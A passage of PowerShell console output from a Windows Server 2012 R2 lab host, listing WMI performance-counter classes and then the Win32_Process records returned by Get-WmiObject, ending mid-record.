{AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...}\nWin32_PerfRawData_Counters_SMBCl... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...}\nWin32_PerfFormattedData_Counters... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...}\nWin32_PerfRawData_Counters_SMBDi... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...}\nWin32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...}\nWin32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...}\nWin32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...}\nWin32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Therm... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_WFP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfRawData_Counters_WFPv4 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfRawData_Counters_WFPv6 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfFormattedData_Counters... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...}\nWin32_PerfRawData_Counters_WSMan... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...}\nWin32_PerfFormattedData_Counters... {} {AllocationCount, Caption, Description, FreeCount...}\nWin32_PerfRawData_Counters_XHCIC... {} {AllocationCount, Caption, Description, FreeCount...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, DpcRequeueCount, DPCsPersec...}\nWin32_PerfRawData_Counters_XHCII... {} {Caption, Description, DpcRequeueCount, DPCsPersec...}\nWin32_PerfFormattedData_Counters... {} {BytesPerSec, Caption, Description, FailedTransferCount...}\nWin32_PerfRawData_Counters_XHCIT... {} {BytesPerSec, Caption, Description, FailedTransferCount...}\nWin32_PerfFormattedData_DdmCount... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...}\nWin32_PerfRawData_DdmCounterProv... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...}\nWin32_PerfFormattedData_DFSNServ... {} {Caption, Description, FolderCount, Frequency_Object...}\nWin32_PerfRawData_DFSNServerServ... {} {Caption, Description, FolderCount, Frequency_Object...}\nWin32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...}\nWin32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...}\nWin32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...}\nWin32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...}\nWin32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...}\nWin32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...}\nWin32_PerfFormattedData_dfsr_DFS... {} {Caption, DatabaseCommits, DatabaseLookups, Description...}\nWin32_PerfRawData_dfsr_DFSReplic... {} {Caption, DatabaseCommits, DatabaseLookups, Description...}\nWin32_PerfFormattedData_Director... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfRawData_DirectoryServi... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfFormattedData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...}\nWin32_PerfRawData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...}\nWin32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...}\nWin32_PerfRawData_ESENT_Database {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...}\nWin32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...}\nWin32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...}\nWin32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...}\nWin32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...}\nWin32_PerfFormattedData_LocalSes... {} {ActiveSessions, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_LocalSessionMa... {} {ActiveSessions, Caption, Description, Frequency_Object...}\nWin32_PerfFormattedData_Lsa_Secu... {} {Caption, ContextHandles, CredentialHandles, Description...}\nWin32_PerfRawData_Lsa_SecurityPe... {} {Caption, ContextHandles, CredentialHandles, Description...}\nWin32_PerfFormattedData_Lsa_Secu... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...}\nWin32_PerfRawData_Lsa_SecuritySy... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...}\nWin32_PerfFormattedData_MSDTC_Di... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...}\nWin32_PerfRawData_MSDTC_Distribu... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...}\nWin32_PerfFormattedData_MSDTCBri... {} {Averageparticipantcommitresponsetime, Averageparticipantprepareresponsetime, Caption, CommitretrycountPersec...}\nWin32_PerfRawData_MSDTCBridge400... {} {Averageparticipantcommitresponsetime, Averageparticipantcommitresponsetime_Base, Averageparticipantprepareresponsetime, Averageparticipantpre...\nWin32_PerfFormattedData_NETCLRDa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETCLRData_NET... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfFormattedData_NETDataP... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETDataP... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...}\nWin32_PerfRawData_NETFramework_N... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...}\nWin32_PerfFormattedData_NETFrame... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...}\nWin32_PerfRawData_NETFramework_N... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETMemor... {} {CacheEntries, CacheHitRatio, CacheHits, CacheMisses...}\nWin32_PerfRawData_NETMemoryCache... {} {CacheEntries, CacheHitRatio, CacheHitRatio_Base, CacheHits...}\nWin32_PerfFormattedData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfRawData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...}\nWin32_PerfRawData_PerfDisk_Logic... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...}\nWin32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...}\nWin32_PerfRawData_PerfDisk_Physi... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...}\nWin32_PerfFormattedData_PerfNet_... {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...}\nWin32_PerfRawData_PerfNet_Browser {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...}\nWin32_PerfFormattedData_PerfNet_... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...}\nWin32_PerfRawData_PerfNet_Redire... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...}\nWin32_PerfFormattedData_PerfNet_... {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...}\nWin32_PerfRawData_PerfNet_Server {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...}\nWin32_PerfFormattedData_PerfNet_... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...}\nWin32_PerfRawData_PerfNet_Server... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...}\nWin32_PerfFormattedData_PerfOS_C... {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...}\nWin32_PerfRawData_PerfOS_Cache {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...}\nWin32_PerfFormattedData_PerfOS_M... {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...}\nWin32_PerfRawData_PerfOS_Memory {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...}\nWin32_PerfFormattedData_PerfOS_N... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...}\nWin32_PerfRawData_PerfOS_NUMANod... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...}\nWin32_PerfFormattedData_PerfOS_O... {} {Caption, Description, Events, Frequency_Object...}\nWin32_PerfRawData_PerfOS_Objects {} {Caption, Description, Events, Frequency_Object...}\nWin32_PerfFormattedData_PerfOS_P... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_PerfOS_PagingFile {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_PerfOS_P... {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...}\nWin32_PerfRawData_PerfOS_Processor {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...}\nWin32_PerfFormattedData_PerfOS_S... {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...}\nWin32_PerfRawData_PerfOS_System {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfRawData_PerfProc_FullI... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfRawData_PerfProc_Image... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...}\nWin32_PerfRawData_PerfProc_JobOb... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfRawData_PerfProc_JobOb... {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfRawData_PerfProc_Process {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfFormattedData_PerfProc... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...}\nWin32_PerfRawData_PerfProc_Proce... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...}\nWin32_PerfRawData_PerfProc_Thread {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_PerfProc_Threa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_PowerMet... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_PowerMeterCoun... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...}\nWin32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...}\nWin32_PerfFormattedData_ServiceM... {} {CallFailedPerSecond, Calls, CallsDuration, CallsFailed...}\nWin32_PerfRawData_ServiceModel40... {} {CallFailedPerSecond, Calls, CallsDuration, CallsDuration_Base...}\nWin32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...}\nWin32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...}\nWin32_PerfFormattedData_SMSvcHos... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...}\nWin32_PerfRawData_SMSvcHost4000_... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...}\nWin32_PerfFormattedData_Spooler_... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...}\nWin32_PerfRawData_Spooler_PrintQ... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...}\nWin32_PerfFormattedData_TapiSrv_... {} {ActiveLines, ActiveTelephones, Caption, ClientApps...}\nWin32_PerfRawData_TapiSrv_Telephony {} {ActiveLines, ActiveTelephones, Caption, ClientApps...}\nWin32_PerfFormattedData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Tcpip_IC... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Tcpip_ICMPv6 {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfRawData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfFormattedData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfRawData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfFormattedData_Tcpip_NB... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfRawData_Tcpip_NBTConne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfRawData_Tcpip_NetworkA... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfRawData_Tcpip_NetworkI... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfFormattedData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfRawData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfFormattedData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfRawData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfFormattedData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfRawData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfFormattedData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfRawData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfFormattedData_TCPIPCou... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...}\nWin32_PerfRawData_TCPIPCounters_... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...}\nWin32_PerfFormattedData_TermServ... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_TermService_Te... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_usbhub_USB {} {AvgBytesPerTransfer, AvgmslatencyforISOtransfers, BulkBytesPerSec, Caption...}\nWin32_PerfRawData_usbhub_USB {} {AvgBytesPerTransfer, AvgBytesPerTransfer_Base, AvgmslatencyforISOtransfers, AvgmslatencyforISOtransfers_Base...}\nWin32_PerfFormattedData_WindowsW... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WindowsWorkflo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Workflow... {} {AverageWorkflowLoadTime, AverageWorkflowPersistTime, Caption, Description...}\nWin32_PerfRawData_WorkflowServic... {} {AverageWorkflowLoadTime, AverageWorkflowLoadTime_Base, AverageWorkflowPersistTime, AverageWorkflowPersistTime_Base...}\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_process\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"0\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"0\"\nCaption : System Idle Process\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate :\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : System Idle Process\nExecutablePath :\nExecutionState :\nHandle : 0\nHandleCount : 0\nInstallDate :\nKernelModeTime : 152086718750\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : System Idle Process\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 0\nOtherTransferCount : 0\nPageFaults : 1\nPageFileUsage : 0\nParentProcessId : 0\nPeakPageFileUsage : 0\nPeakVirtualSize : 65536\nPeakWorkingSetSize : 4\nPriority : 0\nPrivatePageCount : 0\nProcessId : 0\nQuotaNonPagedPoolUsage : 0\nQuotaPagedPoolUsage : 0\nQuotaPeakNonPagedPoolUsage : 0\nQuotaPeakPagedPoolUsage : 0\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 0\nVirtualSize : 65536\nWindowsVersion : 6.3.9600\nWorkingSetSize : 4096\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : System Idle Process\nHandles : 0\nVM : 65536\nWS : 4096\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"4\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"4\"\nCaption : System\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121425.018613-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : System\nExecutablePath :\nExecutionState :\nHandle : 4\nHandleCount : 808\nInstallDate :\nKernelModeTime : 478281250\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : System\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3337\nOtherTransferCount : 131409\nPageFaults : 4798\nPageFileUsage : 112\nParentProcessId : 0\nPeakPageFileUsage : 276\nPeakVirtualSize : 7389184\nPeakWorkingSetSize : 1716\nPriority : 8\nPrivatePageCount : 114688\nProcessId : 4\nQuotaNonPagedPoolUsage : 0\nQuotaPagedPoolUsage : 0\nQuotaPeakNonPagedPoolUsage : 0\nQuotaPeakPagedPoolUsage : 0\nReadOperationCount : 195\nReadTransferCount : 53093300\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 75\nUserModeTime : 0\nVirtualSize : 3432448\nWindowsVersion : 6.3.9600\nWorkingSetSize : 139264\nWriteOperationCount : 13027\nWriteTransferCount : 206413624\nPSComputerName : WIN-2012-DC\nProcessName : System\nHandles : 808\nVM : 3432448\nWS : 139264\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"208\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"208\"\nCaption : smss.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121425.018613-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : smss.exe\nExecutablePath :\nExecutionState :\nHandle : 208\nHandleCount : 52\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : smss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 266\nOtherTransferCount : 31584\nPageFaults : 595\nPageFileUsage : 276\nParentProcessId : 4\nPeakPageFileUsage : 336\nPeakVirtualSize : 25382912\nPeakWorkingSetSize : 1032\nPriority : 11\nPrivatePageCount : 282624\nProcessId : 208\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 13\nQuotaPeakNonPagedPoolUsage : 7\nQuotaPeakPagedPoolUsage : 53\nReadOperationCount : 4\nReadTransferCount : 29188\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 4317184\nWindowsVersion : 6.3.9600\nWorkingSetSize : 217088\nWriteOperationCount : 1\nWriteTransferCount : 32\nPSComputerName : WIN-2012-DC\nProcessName : smss.exe\nHandles : 52\nVM : 